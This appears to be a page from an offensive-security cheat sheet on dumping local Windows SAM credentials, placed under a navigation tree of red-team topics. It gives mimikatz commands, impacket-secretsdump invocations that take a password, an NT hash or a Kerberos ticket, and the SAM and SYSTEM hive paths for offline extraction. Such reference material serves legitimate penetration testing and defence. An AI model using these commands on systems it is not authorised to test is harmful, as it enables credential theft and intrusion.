SecuriTreeHome

SecuriTree

  • Windows Security
    • Post-exploitation
      • Network Tunneling
        (Ligolo-ng, Chisel)
      • Reverse Shell
      • System Manipulation
      • File Transfer
    • Lateral Movement
      • Common Problems
        • Double Hop
        • Remote UAC
      • Techniques
        • Access Token Manipulation
          (RunAs, RunasCs)
        • Pass-the-Ticket (Kerberos)
          (Rubeus, getTGT)
      • Technologies
        • MS-RPC
          • MS-DCOM
          • MS-RRP
          • MS-SCMR
            (PsExec, SmbExec, ScExec)
          • MS-TSCH
          • MS-WMI
            (WmiExec)
        • RDP
        • WinRM
          (winrs, PS Remoting)
    • Domain Privesc
      • ACL Abuse
      • AD Delegation Abuse
        • Constrained Delegation
        • Resource-Based Constrained Delegation
        • Unconstrained Delegation
      • AS-Rep Roasting
      • Certificate Service Abuse
      • Credentials Dump
        • DCSync
        • LSASS Memory
        • Local SAM
        • Windows Vault
      • Group Policies
      • Information to steal
        (files, logs, processes, ...)
      • Kerberoasting
      • Local Admin Hunting
      • MSSQL Abuse
      • NTLM Hash Stealing
      • NTLM Relay
      • Password Spraying
      • RDP Hijacking
      • Tasks and Services Abuse
    • Reconnaissance
      • Active Directory
      • DNS
      • LDAP
      • NetBIOS
      • NFS
      • Port Scanning
      • RPC
      • SMB
      • SMTP
      • SNMP
#Windows Security #Domain Privesc #Credentials Dump #Local SAM

Credentials dump from local SAM

Requirements:

  • You have to be a local administrator on the machine (or SYSTEM).

SAM dump will return all local users on the system along with their hashed passwords in NT hash form.

Windows:

.\mimikatz.exe
> privilege::debug
> token::elevate
> lsadump::sam

Linux:

# Using password
impacket-secretsdump $domain/$user:$password@$host
 
# Using NT hash
impacket-secretsdump -hashes :$nt_hash $domain/$user@$host
 
# Using Kerberos TGT
export KRB5CCNAME=$tgt_ccache_file
impacket-secretsdump $hostname -k -no-pass -dc-ip $dc_ipyar

Offline SAM database dump

You can also steal SAM database file and SYSTEM registry hive and extract credentials offline:

  • SAM: C:\Windows\System32\config\SAM
  • SYSTEM: C:\Windows\System32\config\SYSTEM
# Dump credentials from local SAM and SYSTEM file
impacket-secretsdump -sam $sam_file -system $system_file LOCAL

Children

Local SAM